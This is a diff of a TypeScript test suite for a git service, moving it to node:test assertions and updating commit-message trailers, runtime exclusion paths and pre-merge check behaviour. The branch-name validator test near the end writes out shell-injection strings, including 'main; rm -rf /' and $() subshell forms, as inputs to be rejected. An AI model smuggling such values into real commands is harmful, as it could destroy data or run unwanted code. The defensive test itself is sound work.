     "one-liner with 'fixed' overrides generic title → fix"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("add search", "Optimized query performance with caching"),
     "perf",
     "one-liner with 'performance' and 'caching' → perf"
@@ -211,29 +208,29 @@ async function main(): Promise<void> {
 
   // ─── buildTaskCommitMessage ─────────────────────────────────────────────
 
-  console.log("\n=== buildTaskCommitMessage ===");
-
-  {
+  test('buildTaskCommitMessage', () => {
     const msg = buildTaskCommitMessage({
       taskId: "S01/T02",
       taskTitle: "implement user authentication",
       oneLiner: "Added JWT-based auth with refresh token rotation",
       keyFiles: ["src/auth.ts", "src/middleware/jwt.ts"],
     });
-    assertTrue(msg.startsWith("feat(S01/T02):"), "message starts with type(scope)");
-    assertTrue(msg.includes("JWT-based auth"), "message includes one-liner content");
-    assertTrue(msg.includes("- src/auth.ts"), "message body includes key files");
-    assertTrue(msg.includes("- src/middleware/jwt.ts"), "message body includes second key file");
-  }
+    assert.ok(msg.startsWith("feat:"), "message starts with type: (no scope)");
+    assert.ok(!msg.includes("(S01/T02)"), "no GSD ID in subject line");
+    assert.ok(msg.includes("JWT-based auth"), "message includes one-liner content");
+    assert.ok(msg.includes("- src/auth.ts"), "message body includes key files");
+    assert.ok(msg.includes("- src/middleware/jwt.ts"), "message body includes second key file");
+    assert.ok(msg.includes("GSD-Task: S01/T02"), "GSD-Task trailer in body");
+  });
 
   {
     const msg = buildTaskCommitMessage({
       taskId: "S02/T01",
       taskTitle: "fix login redirect bug",
     });
-    assertTrue(msg.startsWith("fix(S02/T01):"), "infers fix type from title");
-    assertTrue(msg.includes("fix login redirect bug"), "uses task title when no one-liner");
-    assertTrue(!msg.includes("\n"), "no body when no key files");
+    assert.ok(msg.startsWith("fix:"), "infers fix type from title");
+    assert.ok(msg.includes("fix login redirect bug"), "uses task title when no one-liner");
+    assert.ok(msg.includes("GSD-Task: S02/T01"), "GSD-Task trailer present");
   }
 
   {
@@ -242,17 +239,17 @@ async function main(): Promise<void> {
       taskTitle: "add tests",
       oneLiner: "Unit tests for auth module with coverage",
     });
-    assertTrue(msg.startsWith("test(S01/T03):"), "infers test type");
+    assert.ok(msg.startsWith("test:"), "infers test type");
+    assert.ok(msg.includes("GSD-Task: S01/T03"), "GSD-Task trailer present");
   }
 
   // ─── RUNTIME_EXCLUSION_PATHS ───────────────────────────────────────────
 
-  console.log("\n=== RUNTIME_EXCLUSION_PATHS ===");
 
-  assertEq(
+  assert.deepStrictEqual(
     RUNTIME_EXCLUSION_PATHS.length,
-    9,
-    "exactly 9 runtime exclusion paths"
+    13,
+    "exactly 13 runtime exclusion paths"
   );
 
   const expectedPaths = [
@@ -264,40 +261,43 @@ async function main(): Promise<void> {
     ".gsd/completed-units.json",
     ".gsd/STATE.md",
     ".gsd/gsd.db",
+    ".gsd/gsd.db-shm",
+    ".gsd/gsd.db-wal",
+    ".gsd/journal/",
+    ".gsd/doctor-history.jsonl",
     ".gsd/DISCUSSION-MANIFEST.json",
   ];
 
-  assertEq(
+  assert.deepStrictEqual(
     [...RUNTIME_EXCLUSION_PATHS],
     expectedPaths,
     "paths match expected set in order"
   );
 
-  assertTrue(
+  assert.ok(
     RUNTIME_EXCLUSION_PATHS.includes(".gsd/activity/"),
     "includes .gsd/activity/"
   );
-  assertTrue(
+  assert.ok(
     RUNTIME_EXCLUSION_PATHS.includes(".gsd/STATE.md"),
     "includes .gsd/STATE.md"
   );
 
   // ─── runGit ────────────────────────────────────────────────────────────
 
-  console.log("\n=== runGit ===");
 
   const tempDir = mkdtempSync(join(tmpdir(), "gsd-git-service-test-"));
-  run("git init -b main", tempDir);
-  run('git config user.name "Pi Test"', tempDir);
-  run('git config user.email "pi@example.com"', tempDir);
+  runGit(tempDir, ["init", "-b", "main"]);
+  runGit(tempDir, ["config", "user.name", "Pi Test"]);
+  runGit(tempDir, ["config", "user.email", "pi@example.com"]);
 
   // runGit should work on a valid repo
   const branch = runGit(tempDir, ["branch", "--show-current"]);
-  assertEq(branch, "main", "runGit returns current branch");
+  assert.deepStrictEqual(branch, "main", "runGit returns current branch");
 
   // runGit allowFailure returns empty string on failure
   const result = runGit(tempDir, ["log", "--oneline"], { allowFailure: true });
-  assertEq(result, "", "runGit allowFailure returns empty on error (no commits yet)");
+  assert.deepStrictEqual(result, "", "runGit allowFailure returns empty on error (no commits yet)");
 
   // runGit throws on failure without allowFailure
   let threw = false;
@@ -305,22 +305,21 @@ async function main(): Promise<void> {
     runGit(tempDir, ["log", "--oneline"]);
   } catch (e) {
     threw = true;
-    assertTrue(
+    assert.ok(
       (e as Error).message.includes("git log --oneline failed"),
       "error message includes command and path"
     );
   }
-  assertTrue(threw, "runGit throws without allowFailure on error");
+  assert.ok(threw, "runGit throws without allowFailure on error");
 
   // ─── Type exports compile check ────────────────────────────────────────
 
-  console.log("\n=== Type exports ===");
 
   // These are compile-time checks — if we got here, the types import fine
   const _prefs: GitPreferences = { auto_push: true, remote: "origin" };
   const _opts: CommitOptions = { message: "test" };
-  assertTrue(true, "GitPreferences type exported and usable");
-  assertTrue(true, "CommitOptions type exported and usable");
+  assert.ok(true, "GitPreferences type exported and usable");
+  assert.ok(true, "CommitOptions type exported and usable");
 
   // Cleanup T01 temp dir
   rmSync(tempDir, { recursive: true, force: true });
@@ -335,21 +334,19 @@ async function main(): Promise<void> {
 
   function initTempRepo(): string {
     const dir = mkdtempSync(join(tmpdir(), "gsd-git-t02-"));
-    run("git init -b main", dir);
-    run('git config user.name "Pi Test"', dir);
-    run('git config user.email "pi@example.com"', dir);
+    runGit(dir, ["init", "-b", "main"]);
+    runGit(dir, ["config", "user.name", "Pi Test"]);
+    runGit(dir, ["config", "user.email", "pi@example.com"]);
     // Need an initial commit so HEAD exists
     createFile(dir, ".gitkeep", "");
-    run("git add -A", dir);
-    run('git commit -m "init"', dir);
+    runGit(dir, ["add", "-A"]);
+    runGit(dir, ["commit", "-m", "init"]);
     return dir;
   }
 
   // ─── GitServiceImpl: smart staging ─────────────────────────────────────
 
-  console.log("\n=== GitServiceImpl: smart staging ===");
-
-  {
+  test('GitServiceImpl: smart staging', () => {
     const repo = initTempRepo();
     const svc = new GitServiceImpl(repo);
 
@@ -366,34 +363,32 @@ async function main(): Promise<void> {
 
     const result = svc.commit({ message: "test: smart staging" });
 
-    assertEq(result, "test: smart staging", "commit returns the commit message");
+    assert.deepStrictEqual(result, "test: smart staging", "commit returns the commit message");
 
     // Verify only src/code.ts is in the commit
     const showStat = run("git show --stat --format= HEAD", repo);
-    assertTrue(showStat.includes("src/code.ts"), "src/code.ts is in the commit");
-    assertTrue(!showStat.includes(".gsd/activity"), ".gsd/activity/ excluded from commit");
-    assertTrue(!showStat.includes(".gsd/runtime"), ".gsd/runtime/ excluded from commit");
-    assertTrue(!showStat.includes("STATE.md"), ".gsd/STATE.md excluded from commit");
-    assertTrue(!showStat.includes("auto.lock"), ".gsd/auto.lock excluded from commit");
-    assertTrue(!showStat.includes("metrics.json"), ".gsd/metrics.json excluded from commit");
-    assertTrue(!showStat.includes(".gsd/worktrees"), ".gsd/worktrees/ excluded from commit");
+    assert.ok(showStat.includes("src/code.ts"), "src/code.ts is in the commit");
+    assert.ok(!showStat.includes(".gsd/activity"), ".gsd/activity/ excluded from commit");
+    assert.ok(!showStat.includes(".gsd/runtime"), ".gsd/runtime/ excluded from commit");
+    assert.ok(!showStat.includes("STATE.md"), ".gsd/STATE.md excluded from commit");
+    assert.ok(!showStat.includes("auto.lock"), ".gsd/auto.lock excluded from commit");
+    assert.ok(!showStat.includes("metrics.json"), ".gsd/metrics.json excluded from commit");
+    assert.ok(!showStat.includes(".gsd/worktrees"), ".gsd/worktrees/ excluded from commit");
 
     // Verify runtime files are still untracked
     // git status --short may collapse to "?? .gsd/" or show individual files
     // Use --untracked-files=all to force individual listing
     const statusOut = run("git status --short --untracked-files=all", repo);
-    assertTrue(statusOut.includes(".gsd/activity/"), "activity still untracked after commit");
-    assertTrue(statusOut.includes(".gsd/runtime/"), "runtime still untracked after commit");
-    assertTrue(statusOut.includes(".gsd/STATE.md"), "STATE.md still untracked after commit");
+    assert.ok(statusOut.includes(".gsd/activity/"), "activity still untracked after commit");
+    assert.ok(statusOut.includes(".gsd/runtime/"), "runtime still untracked after commit");
+    assert.ok(statusOut.includes(".gsd/STATE.md"), "STATE.md still untracked after commit");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── GitServiceImpl: smart staging excludes tracked runtime files ──────
 
-  console.log("\n=== GitServiceImpl: smart staging excludes tracked runtime files ===");
-
-  {
+  test('GitServiceImpl: smart staging excludes tracked runtime files', () => {
     // Reproduces the real bug: .gsd/ runtime files that are already tracked
     // (in the git index) must be excluded from staging even when .gsd/ is
     // in .gitignore. The old pathspec-exclude approach failed silently in
@@ -423,9 +418,9 @@ async function main(): Promise<void> {
 
     // Verify runtime files are tracked (precondition)
     const tracked = run("git ls-files .gsd/", repo);
-    assertTrue(tracked.includes("metrics.json"), "precondition: metrics.json tracked");
-    assertTrue(tracked.includes("completed-units.json"), "precondition: completed-units.json tracked");
-    assertTrue(tracked.includes("activity/log.jsonl"), "precondition: activity log tracked");
+    assert.ok(tracked.includes("metrics.json"), "precondition: metrics.json tracked");
+    assert.ok(tracked.includes("completed-units.json"), "precondition: completed-units.json tracked");
+    assert.ok(tracked.includes("activity/log.jsonl"), "precondition: activity log tracked");
 
     // Now modify both runtime and real files
     createFile(repo, ".gsd/metrics.json", '{"version":2}');
@@ -436,15 +431,15 @@ async function main(): Promise<void> {
     // autoCommit should commit real.ts. The first call also runs auto-cleanup
     // which removes runtime files from the index via a dedicated commit.
     const msg = svc.autoCommit("execute-task", "M001/S01/T01");
-    assertTrue(msg !== null, "autoCommit produces a commit");
+    assert.ok(msg !== null, "autoCommit produces a commit");
 
     const show = run("git show --stat HEAD", repo);
-    assertTrue(show.includes("src/real.ts"), "real files are committed");
+    assert.ok(show.includes("src/real.ts"), "real files are committed");
 
     // After the commit, runtime files must no longer be in the git index.
     // They remain on disk but are untracked (protected by .gitignore).
     const trackedAfter = run("git ls-files .gsd/", repo);
-    assertEq(trackedAfter, "", "no .gsd/ runtime files remain in the index");
+    assert.deepStrictEqual(trackedAfter, "", "no .gsd/ runtime files remain in the index");
 
     // Verify a second autoCommit with changed runtime files does NOT stage them
     createFile(repo, ".gsd/metrics.json", '{"version":3}');
@@ -452,37 +447,33 @@ async function main(): Promise<void> {
     createFile(repo, "src/real.ts", "third version");
 
     const msg2 = svc.autoCommit("execute-task", "M001/S01/T02");
-    assertTrue(msg2 !== null, "second autoCommit produces a commit");
+    assert.ok(msg2 !== null, "second autoCommit produces a commit");
 
     const show2 = run("git show --stat HEAD", repo);
-    assertTrue(show2.includes("src/real.ts"), "real files committed in second commit");
-    assertTrue(!show2.includes("metrics"), "metrics.json not in second commit");
-    assertTrue(!show2.includes("completed-units"), "completed-units.json not in second commit");
-    assertTrue(!show2.includes("activity"), "activity not in second commit");
+    assert.ok(show2.includes("src/real.ts"), "real files committed in second commit");
+    assert.ok(!show2.includes("metrics"), "metrics.json not in second commit");
+    assert.ok(!show2.includes("completed-units"), "completed-units.json not in second commit");
+    assert.ok(!show2.includes("activity"), "activity not in second commit");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── GitServiceImpl: autoCommit on clean repo ──────────────────────────
 
-  console.log("\n=== GitServiceImpl: autoCommit ===");
-
-  {
+  test('GitServiceImpl: autoCommit', () => {
     const repo = initTempRepo();
     const svc = new GitServiceImpl(repo);
 
     // Clean repo — autoCommit should return null
     const cleanResult = svc.autoCommit("task", "T01");
-    assertEq(cleanResult, null, "autoCommit on clean repo returns null");
+    assert.deepStrictEqual(cleanResult, null, "autoCommit on clean repo returns null");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── GitServiceImpl: autoCommit on dirty repo ──────────────────────────
 
-  console.log("\n=== GitServiceImpl: autoCommit on dirty repo ===");
-
-  {
+  test('GitServiceImpl: autoCommit on dirty repo', () => {
     const repo = initTempRepo();
     const svc = new GitServiceImpl(repo);
 
@@ -490,10 +481,10 @@ async function main(): Promise<void> {
 
     // Without task context, autoCommit uses generic chore message
     const msg = svc.autoCommit("task", "T01");
-    assertEq(msg, "chore(T01): auto-commit after task", "autoCommit returns generic format without task context");
+    assert.deepStrictEqual(msg, "chore: auto-commit after task\n\nGSD-Unit: T01", "autoCommit returns generic format with trailer");
 
     const log = run("git log --oneline -1", repo);
-    assertTrue(log.includes("chore(T01): auto-commit after task"), "generic commit message is in git log");
+    assert.ok(log.includes("chore: auto-commit after task"), "generic commit message is in git log");
 
     // With task context, autoCommit uses meaningful message
     createFile(repo, "src/auth.ts", "export function login() {}");
@@ -503,18 +494,17 @@ async function main(): Promise<void> {
       oneLiner: "Added JWT-based auth with refresh token rotation",
       keyFiles: ["src/auth.ts"],
     });
-    assertTrue(msg2 !== null, "autoCommit with task context returns a message");
-    assertTrue(msg2!.startsWith("feat(S01/T02):"), "meaningful commit uses feat type and scope");
-    assertTrue(msg2!.includes("JWT-based auth"), "meaningful commit includes one-liner content");
+    assert.ok(msg2 !== null, "autoCommit with task context returns a message");
+    assert.ok(msg2!.startsWith("feat:"), "meaningful commit uses feat type without scope");
+    assert.ok(msg2!.includes("JWT-based auth"), "meaningful commit includes one-liner content");
+    assert.ok(msg2!.includes("GSD-Task: S01/T02"), "meaningful commit has GSD-Task trailer");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── GitServiceImpl: empty-after-staging guard ─────────────────────────
 
-  console.log("\n=== GitServiceImpl: empty-after-staging guard ===");
-
-  {
+  test('GitServiceImpl: empty-after-staging guard', () => {
     const repo = initTempRepo();
     const svc = new GitServiceImpl(repo);
 
@@ -522,20 +512,18 @@ async function main(): Promise<void> {
     createFile(repo, ".gsd/activity/x.jsonl", "data");
 
     const result = svc.autoCommit("task", "T02");
-    assertEq(result, null, "autoCommit returns null when only runtime files are dirty");
+    assert.deepStrictEqual(result, null, "autoCommit returns null when only runtime files are dirty");
 
     // Verify no new commit was created (should still be at init commit)
     const logCount = run("git rev-list --count HEAD", repo);
-    assertEq(logCount, "1", "no new commit created when only runtime files changed");
+    assert.deepStrictEqual(logCount, "1", "no new commit created when only runtime files changed");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── GitServiceImpl: autoCommit with extraExclusions ───────────────────
 
-  console.log("\n=== GitServiceImpl: autoCommit with extraExclusions ===");
-
-  {
+  test('GitServiceImpl: autoCommit with extraExclusions', () => {
     const repo = initTempRepo();
     const svc = new GitServiceImpl(repo);
 
@@ -545,21 +533,19 @@ async function main(): Promise<void> {
 
     // Auto-commit with .gsd/ excluded (simulates pre-switch)
     const msg = svc.autoCommit("pre-switch", "main", [".gsd/"]);
-    assertEq(msg, "chore(main): auto-commit after pre-switch", "pre-switch autoCommit with .gsd/ exclusion commits");
+    assert.deepStrictEqual(msg, "chore: auto-commit after pre-switch\n\nGSD-Unit: main", "pre-switch autoCommit with .gsd/ exclusion commits");
 
     // Verify .gsd/ file was NOT committed
     const show = run("git show --stat HEAD", repo);
-    assertTrue(!show.includes("ROADMAP"), ".gsd/ files excluded from pre-switch auto-commit");
-    assertTrue(show.includes("feature.ts"), "non-.gsd/ files included in pre-switch auto-commit");
+    assert.ok(!show.includes("ROADMAP"), ".gsd/ files excluded from pre-switch auto-commit");
+    assert.ok(show.includes("feature.ts"), "non-.gsd/ files included in pre-switch auto-commit");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── GitServiceImpl: autoCommit extraExclusions — only .gsd/ dirty ────
 
-  console.log("\n=== GitServiceImpl: autoCommit extraExclusions — only .gsd/ dirty ===");
-
-  {
+  test('GitServiceImpl: autoCommit extraExclusions — only .gsd/ dirty', () => {
     const repo = initTempRepo();
     const svc = new GitServiceImpl(repo);
 
@@ -569,84 +555,78 @@ async function main(): Promise<void> {
 
     // Auto-commit with .gsd/ excluded — nothing else to commit
     const result = svc.autoCommit("pre-switch", "main", [".gsd/"]);
-    assertEq(result, null, "autoCommit returns null when only .gsd/ files are dirty and excluded");
+    assert.deepStrictEqual(result, null, "autoCommit returns null when only .gsd/ files are dirty and excluded");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── GitServiceImpl: commit returns null when nothing staged ───────────
 
-  console.log("\n=== GitServiceImpl: commit empty ===");
-
-  {
+  test('GitServiceImpl: commit empty', () => {
     const repo = initTempRepo();
     const svc = new GitServiceImpl(repo);
 
     // Nothing dirty, commit should return null
     const result = svc.commit({ message: "should not commit" });
-    assertEq(result, null, "commit returns null when nothing to stage");
+    assert.deepStrictEqual(result, null, "commit returns null when nothing to stage");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── Helper: create repo for branch tests ────────────────────────────
 
   function initBranchTestRepo(): string {
     const dir = mkdtempSync(join(tmpdir(), "gsd-git-t03-"));
-    run("git init -b main", dir);
-    run('git config user.name "Pi Test"', dir);
-    run('git config user.email "pi@example.com"', dir);
+    runGit(dir, ["init", "-b", "main"]);
+    runGit(dir, ["config", "user.name", "Pi Test"]);
+    runGit(dir, ["config", "user.email", "pi@example.com"]);
     createFile(dir, ".gitkeep", "");
-    run("git add -A", dir);
-    run('git commit -m "init"', dir);
+    runGit(dir, ["add", "-A"]);
+    runGit(dir, ["commit", "-m", "init"]);
     return dir;
   }
 
   // ─── getCurrentBranch ────────────────────────────────────────────────
 
-  console.log("\n=== Branch queries ===");
-
-  {
+  test('Branch queries', () => {
     const repo = initBranchTestRepo();
     const svc = new GitServiceImpl(repo);
 
-    assertEq(svc.getCurrentBranch(), "main", "getCurrentBranch returns main on main branch");
+    assert.deepStrictEqual(svc.getCurrentBranch(), "main", "getCurrentBranch returns main on main branch");
 
     run("git checkout -b gsd/M001/S01", repo);
-    assertEq(svc.getCurrentBranch(), "gsd/M001/S01", "getCurrentBranch returns slice branch name");
+    assert.deepStrictEqual(svc.getCurrentBranch(), "gsd/M001/S01", "getCurrentBranch returns slice branch name");
 
     run("git checkout -b feature/foo", repo);
-    assertEq(svc.getCurrentBranch(), "feature/foo", "getCurrentBranch returns feature branch name");
+    assert.deepStrictEqual(svc.getCurrentBranch(), "feature/foo", "getCurrentBranch returns feature branch name");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── getMainBranch ────────────────────────────────────────────────────
 
-  console.log("\n=== getMainBranch ===");
-
-  {
+  test('getMainBranch', () => {
     const repo = initBranchTestRepo();
     const svc = new GitServiceImpl(repo);
 
     // Basic case: repo has "main" branch
-    assertEq(svc.getMainBranch(), "main", "getMainBranch returns main when main exists");
+    assert.deepStrictEqual(svc.getMainBranch(), "main", "getMainBranch returns main when main exists");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   {
     // master-only repo
     const repo = mkdtempSync(join(tmpdir(), "gsd-git-t03-master-"));
-    run("git init -b master", repo);
-    run('git config user.name "Pi Test"', repo);
-    run('git config user.email "pi@example.com"', repo);
+    runGit(repo, ["init", "-b", "master"]);
+    runGit(repo, ["config", "user.name", "Pi Test"]);
+    runGit(repo, ["config", "user.email", "pi@example.com"]);
     createFile(repo, ".gitkeep", "");
-    run("git add -A", repo);
-    run('git commit -m "init"', repo);
+    runGit(repo, ["add", "-A"]);
+    runGit(repo, ["commit", "-m", "init"]);
 
     const svc = new GitServiceImpl(repo);
-    assertEq(svc.getMainBranch(), "master", "getMainBranch returns master when only master exists");
+    assert.deepStrictEqual(svc.getMainBranch(), "master", "getMainBranch returns master when only master exists");
 
     rmSync(repo, { recursive: true, force: true });
   }
@@ -655,13 +635,11 @@ async function main(): Promise<void> {
   // S05: Enhanced features — snapshots, pre-merge checks
   // ═══════════════════════════════════════════════════════════════════════
 
-  // ─── createSnapshot: prefs enabled ─────────────────────────────────────
+  // ─── createSnapshot: default (enabled) ─────────────────────────────────
 
-  console.log("\n=== createSnapshot: enabled ===");
-
-  {
+  test('createSnapshot: enabled by default when prefs omitted', () => {
     const repo = initBranchTestRepo();
-    const svc = new GitServiceImpl(repo, { snapshots: true });
+    const svc = new GitServiceImpl(repo);
 
     // Create a branch with a commit
     run("git checkout -b gsd/M001/S01", repo);
@@ -673,16 +651,14 @@ async function main(): Promise<void> {
 
     // Verify ref exists under refs/gsd/snapshots/
     const refs = run("git for-each-ref refs/gsd/snapshots/", repo);
-    assertTrue(refs.includes("refs/gsd/snapshots/gsd/M001/S01/"), "snapshot ref created under refs/gsd/snapshots/");
+    assert.ok(refs.includes("refs/gsd/snapshots/gsd/M001/S01/"), "snapshot ref created under refs/gsd/snapshots/");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── createSnapshot: prefs disabled ────────────────────────────────────
 
-  console.log("\n=== createSnapshot: disabled ===");
-
-  {
+  test('createSnapshot: disabled', () => {
     const repo = initBranchTestRepo();
     const svc = new GitServiceImpl(repo, { snapshots: false });
 
@@ -694,16 +670,47 @@ async function main(): Promise<void> {
     svc.createSnapshot("gsd/M001/S01");
 
     const refs = run("git for-each-ref refs/gsd/snapshots/", repo);
-    assertEq(refs, "", "no snapshot ref created when prefs.snapshots is false");
+    assert.deepStrictEqual(refs, "", "no snapshot ref created when prefs.snapshots is false");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
+
+  // ─── runPreMergeCheck: default (auto-detect) ──────────────────────────
+
+  test('runPreMergeCheck: auto-detects when prefs omitted', () => {
+    const repo = initBranchTestRepo();
+    createFile(repo, "package.json", JSON.stringify({
+      name: "test-default",
+      scripts: { test: 'node -e "process.exit(0)"' },
+    }));
+    run("git add -A", repo);
+    run('git commit -m "add package.json"', repo);
+
+    // No pre_merge_check pref set — should auto-detect and run
+    const svc = new GitServiceImpl(repo);
+    const result: PreMergeCheckResult = svc.runPreMergeCheck();
+
+    assert.deepStrictEqual(result.passed, true, "runPreMergeCheck auto-detects and passes when prefs omitted");
+    assert.ok(!result.skipped, "runPreMergeCheck is not skipped when prefs omitted and package.json exists");
+
+    rmSync(repo, { recursive: true, force: true });
+  });
+
+  test('runPreMergeCheck: gracefully skips when prefs omitted and no package.json', () => {
+    const repo = initBranchTestRepo();
+    // No package.json — auto-detect should skip gracefully
+    const svc = new GitServiceImpl(repo);
+    const result: PreMergeCheckResult = svc.runPreMergeCheck();
+
+    assert.deepStrictEqual(result.passed, true, "runPreMergeCheck passes when no package.json (skip)");
+    assert.deepStrictEqual(result.skipped, true, "runPreMergeCheck skips when no test runner detected");
+
+    rmSync(repo, { recursive: true, force: true });
+  });
 
   // ─── runPreMergeCheck: pass ────────────────────────────────────────────
 
-  console.log("\n=== runPreMergeCheck: pass ===");
-
-  {
+  test('runPreMergeCheck: pass', () => {
     const repo = initBranchTestRepo();
     // Create package.json with passing test script
     createFile(repo, "package.json", JSON.stringify({
@@ -716,17 +723,15 @@ async function main(): Promise<void> {
     const svc = new GitServiceImpl(repo, { pre_merge_check: true });
     const result: PreMergeCheckResult = svc.runPreMergeCheck();
 
-    assertEq(result.passed, true, "runPreMergeCheck returns passed:true when tests pass");
-    assertTrue(!result.skipped, "runPreMergeCheck is not skipped when enabled");
+    assert.deepStrictEqual(result.passed, true, "runPreMergeCheck returns passed:true when tests pass");
+    assert.ok(!result.skipped, "runPreMergeCheck is not skipped when enabled");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── runPreMergeCheck: fail ────────────────────────────────────────────
 
-  console.log("\n=== runPreMergeCheck: fail ===");
-
-  {
+  test('runPreMergeCheck: fail', () => {
     const repo = initBranchTestRepo();
     // Create package.json with failing test script
     createFile(repo, "package.json", JSON.stringify({
@@ -739,17 +744,15 @@ async function main(): Promise<void> {
     const svc = new GitServiceImpl(repo, { pre_merge_check: true });
     const result: PreMergeCheckResult = svc.runPreMergeCheck();
 
-    assertEq(result.passed, false, "runPreMergeCheck returns passed:false when tests fail");
-    assertTrue(!result.skipped, "runPreMergeCheck is not skipped when enabled");
+    assert.deepStrictEqual(result.passed, false, "runPreMergeCheck returns passed:false when tests fail");
+    assert.ok(!result.skipped, "runPreMergeCheck is not skipped when enabled");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── runPreMergeCheck: disabled ────────────────────────────────────────
 
-  console.log("\n=== runPreMergeCheck: disabled ===");
-
-  {
+  test('runPreMergeCheck: disabled', () => {
     const repo = initBranchTestRepo();
     createFile(repo, "package.json", JSON.stringify({
       name: "test-disabled",
@@ -761,98 +764,86 @@ async function main(): Promise<void> {
     const svc = new GitServiceImpl(repo, { pre_merge_check: false });
     const result: PreMergeCheckResult = svc.runPreMergeCheck();
 
-    assertEq(result.skipped, true, "runPreMergeCheck skipped when pre_merge_check is false");
-    assertEq(result.passed, true, "runPreMergeCheck returns passed:true when skipped (no block)");
+    assert.deepStrictEqual(result.skipped, true, "runPreMergeCheck skipped when pre_merge_check is false");
+    assert.deepStrictEqual(result.passed, true, "runPreMergeCheck returns passed:true when skipped (no block)");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── runPreMergeCheck: custom command ──────────────────────────────────
 
-  console.log("\n=== runPreMergeCheck: custom command ===");
-
-  {
+  test('runPreMergeCheck: custom command', () => {
     const repo = initBranchTestRepo();
     // Custom command string overrides auto-detection
     const svc = new GitServiceImpl(repo, { pre_merge_check: 'node -e "process.exit(0)"' });
     const result: PreMergeCheckResult = svc.runPreMergeCheck();
 
-    assertEq(result.passed, true, "runPreMergeCheck passes with custom command that exits 0");
-    assertTrue(!result.skipped, "custom command is not skipped");
+    assert.deepStrictEqual(result.passed, true, "runPreMergeCheck passes with custom command that exits 0");
+    assert.ok(!result.skipped, "custom command is not skipped");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── VALID_BRANCH_NAME regex ──────────────────────────────────────────
 
-  console.log("\n=== VALID_BRANCH_NAME regex ===");
-
-  {
+  test('VALID_BRANCH_NAME regex', () => {
     // Valid branch names
-    assertTrue(VALID_BRANCH_NAME.test("main"), "VALID_BRANCH_NAME accepts 'main'");
-    assertTrue(VALID_BRANCH_NAME.test("master"), "VALID_BRANCH_NAME accepts 'master'");
-    assertTrue(VALID_BRANCH_NAME.test("develop"), "VALID_BRANCH_NAME accepts 'develop'");
-    assertTrue(VALID_BRANCH_NAME.test("feature/foo"), "VALID_BRANCH_NAME accepts 'feature/foo'");
-    assertTrue(VALID_BRANCH_NAME.test("release-1.0"), "VALID_BRANCH_NAME accepts 'release-1.0'");
-    assertTrue(VALID_BRANCH_NAME.test("my_branch"), "VALID_BRANCH_NAME accepts 'my_branch'");
-    assertTrue(VALID_BRANCH_NAME.test("v2.0.1"), "VALID_BRANCH_NAME accepts 'v2.0.1'");
+    assert.ok(VALID_BRANCH_NAME.test("main"), "VALID_BRANCH_NAME accepts 'main'");
+    assert.ok(VALID_BRANCH_NAME.test("master"), "VALID_BRANCH_NAME accepts 'master'");
+    assert.ok(VALID_BRANCH_NAME.test("develop"), "VALID_BRANCH_NAME accepts 'develop'");
+    assert.ok(VALID_BRANCH_NAME.test("feature/foo"), "VALID_BRANCH_NAME accepts 'feature/foo'");
+    assert.ok(VALID_BRANCH_NAME.test("release-1.0"), "VALID_BRANCH_NAME accepts 'release-1.0'");
+    assert.ok(VALID_BRANCH_NAME.test("my_branch"), "VALID_BRANCH_NAME accepts 'my_branch'");
+    assert.ok(VALID_BRANCH_NAME.test("v2.0.1"), "VALID_BRANCH_NAME accepts 'v2.0.1'");
 
     // Invalid / injection attempts
-    assertTrue(!VALID_BRANCH_NAME.test("main; rm -rf /"), "VALID_BRANCH_NAME rejects shell injection");
-    assertTrue(!VALID_BRANCH_NAME.test("main && echo pwned"), "VALID_BRANCH_NAME rejects && injection");
-    assertTrue(!VALID_BRANCH_NAME.test(""), "VALID_BRANCH_NAME rejects empty string");
-    assertTrue(!VALID_BRANCH_NAME.test("branch name"), "VALID_BRANCH_NAME rejects spaces");
-    assertTrue(!VALID_BRANCH_NAME.test("branch`cmd`"), "VALID_BRANCH_NAME rejects backticks");
-    assertTrue(!VALID_BRANCH_NAME.test("branch$(cmd)"), "VALID_BRANCH_NAME rejects $() subshell");
-  }
+    assert.ok(!VALID_BRANCH_NAME.test("main; rm -rf /"), "VALID_BRANCH_NAME rejects shell injection");
+    assert.ok(!VALID_BRANCH_NAME.test("main && echo pwned"), "VALID_BRANCH_NAME rejects && injection");
+    assert.ok(!VALID_BRANCH_NAME.test(""), "VALID_BRANCH_NAME rejects empty string");
+    assert.ok(!VALID_BRANCH_NAME.test("branch name"), "VALID_BRANCH_NAME rejects spaces");
+    assert.ok(!VALID_BRANCH_NAME.test("branch`cmd`"), "VALID_BRANCH_NAME rejects backticks");
+    assert.ok(!VALID_BRANCH_NAME.test("branch$(cmd)"), "VALID_BRANCH_NAME rejects $() subshell");
+  });
 
   // ─── getMainBranch: configured main_branch preference ──────────────────
 
-  console.log("\n=== getMainBranch: configured main_branch ===");
-
-  {
+  test('getMainBranch: configured main_branch', () => {
     const repo = initBranchTestRepo();
     const svc = new GitServiceImpl(repo, { main_branch: "trunk" });
 
-    assertEq(svc.getMainBranch(), "trunk", "getMainBranch returns configured main_branch preference");
+    assert.deepStrictEqual(svc.getMainBranch(), "trunk", "getMainBranch returns configured main_branch preference");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── getMainBranch: falls back to auto-detection when not set ──────────
 
-  console.log("\n=== getMainBranch: fallback to auto-detection ===");
-
-  {
+  test('getMainBranch: fallback to auto-detection', () => {
     const repo = initBranchTestRepo();
     const svc = new GitServiceImpl(repo, {});
 
